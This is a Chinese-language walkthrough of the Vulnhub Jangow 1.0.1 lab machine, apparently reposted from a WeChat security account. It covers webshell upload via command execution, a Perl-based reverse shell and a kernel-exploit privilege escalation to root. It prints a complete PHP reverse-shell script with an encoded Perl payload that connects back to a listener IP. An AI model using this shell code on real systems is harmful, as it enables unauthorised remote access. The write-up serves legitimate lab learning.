第6集:Vulnhub通关笔记之Jangow1.0.1

admin
admin
admin
102932
文章
87
评论
2023年9月11日09:51:10评论5 views字数 2700阅读9分0秒阅读模式
第6集:Vulnhub通关笔记之Jangow1.0.1
01

背景介绍
    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,根据漏洞获取权限,并进行权限提升操作获取最终flag。
平台地址:https://www.vulnhub.com/
第6集:Vulnhub通关笔记之Jangow1.0.1

02

开始冲刺
    先扫描靶机IP地址:
第6集:Vulnhub通关笔记之Jangow1.0.1
    好的,就是你了,打开地址有一个site目录,我们访问下:
第6集:Vulnhub通关笔记之Jangow1.0.1
    打开之后是一个站点(其实页面内容不这样,这是我改的- -):
第6集:Vulnhub通关笔记之Jangow1.0.1
    右上角有三个模块可点击,发现了其中有一个疑似不对劲:
第6集:Vulnhub通关笔记之Jangow1.0.1
    哎哟呵,直接命令执行了是吧:
第6集:Vulnhub通关笔记之Jangow1.0.1
    那我可直接写WebShell进去了,我要进去了哦,我真的进去了哦:
第6集:Vulnhub通关笔记之Jangow1.0.1
    好的,已经进去,而且出来了:
第6集:Vulnhub通关笔记之Jangow1.0.1
   哥斯拉尝试连接Shell,呜呼:
第6集:Vulnhub通关笔记之Jangow1.0.1
    目录下有第一个Flag:
第6集:Vulnhub通关笔记之Jangow1.0.1
    为了方便后续提权,我们先反弹个Shell。整活,PHP反弹Shell:
<?phpfunction which($pr) {  $path = execute("which $pr");  return ($path ? $path : $pr);  }function execute($cfe) {  $res = '';  if ($cfe) {    if(function_exists('exec')) {      @exec($cfe,$res);      $res = join("n",$res);      }       elseif(function_exists('shell_exec')) {      $res = @shell_exec($cfe);      } elseif(function_exists('system')) {@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')) {@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f = @popen($cfe,"r"))) {$res = '';while(!@feof($f)) {$res .= @fread($f,1024);}@pclose($f);}}return $res;}function cf($fname,$text){if($fp=@fopen($fname,'w')) {@fputs($fp,@base64_decode($text));@fclose($fp);}}$yourip = "192.168.110.204"; //监听地址$yourport = '6666';       //监听端口$usedb = array('perl'=>'perl','c'=>'c');$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"."hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"."sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"."kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"."KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"."OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";cf('/tmp/.bc',$back_connect);$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");?> 
    根据实际情况修改监听地址与监听端口:
第6集:Vulnhub通关笔记之Jangow1.0.1
    我靠,没反应?没弹?
第6集:Vulnhub通关笔记之Jangow1.0.1
    这里就涉及到一个知识了,有时候会因为防火墙限制,有些端口无法被访问,所以我们可以用常见WEB端口来反弹Shell。这边的话,我们用443端口来重新反弹:
第6集:Vulnhub通关笔记之Jangow1.0.1
    重新监听并访问文件,这不就有了吗:
第6集:Vulnhub通关笔记之Jangow1.0.1
    毫无疑问,只有网站用户权限,我们需要提权到root权限。

权限提升
    先看看有没有系统相关的提权利用脚本,让我们先使用命令查看一下系统发行版本:
lsb_release -a
第6集:Vulnhub通关笔记之Jangow1.0.1
    打开 Exploit-DB,搜索一下 Ubuntu 16.04相关利用脚本:
https://www.exploit-db.com/
第6集:Vulnhub通关笔记之Jangow1.0.1
    我们用这个试试:
第6集:Vulnhub通关笔记之Jangow1.0.1
    复制代码,利用Shell新建文件为 .c 后缀文件,因为这是c的利用脚本:
第6集:Vulnhub通关笔记之Jangow1.0.1
    要想正常使用,需要编译C的代码,看看有没有gcc命令:
第6集:Vulnhub通关笔记之Jangow1.0.1
    有就省事了,用gcc编译代码,编译后目录下生成了一个 a.out文件:
第6集:Vulnhub通关笔记之Jangow1.0.1
    我们直接运行 a.out 提权脚本:
第6集:Vulnhub通关笔记之Jangow1.0.1
    查看权限,已经是root了:
第6集:Vulnhub通关笔记之Jangow1.0.1
    读取root目录下的flag,下机:
第6集:Vulnhub通关笔记之Jangow1.0.1


第6集:Vulnhub通关笔记之Jangow1.0.1
(
END
)



!扫码添加哦!
联系进群即可,群内可交流技术

第6集:Vulnhub通关笔记之Jangow1.0.1

免责声明











   
文章内容仅限授权测试或学习使用
请勿进行非法的测试或攻击

    利用本账号所发文章
进行直接或间接的非法行为
均由操作者本人负全责
犀利猪安全文章对应作者

不为此承担任何责任

文章来自互联网或原创

如有侵权可联系我方进行删除

并诚挚的跟您说声抱歉





原文始发于微信公众号(犀利猪安全):第6集:Vulnhub通关笔记之Jangow1.0.1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月11日09:51:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第6集:Vulnhub通关笔记之Jangow1.0.1https://cn-sec.com/archives/2023800.html

发表评论

匿名网友 填写信息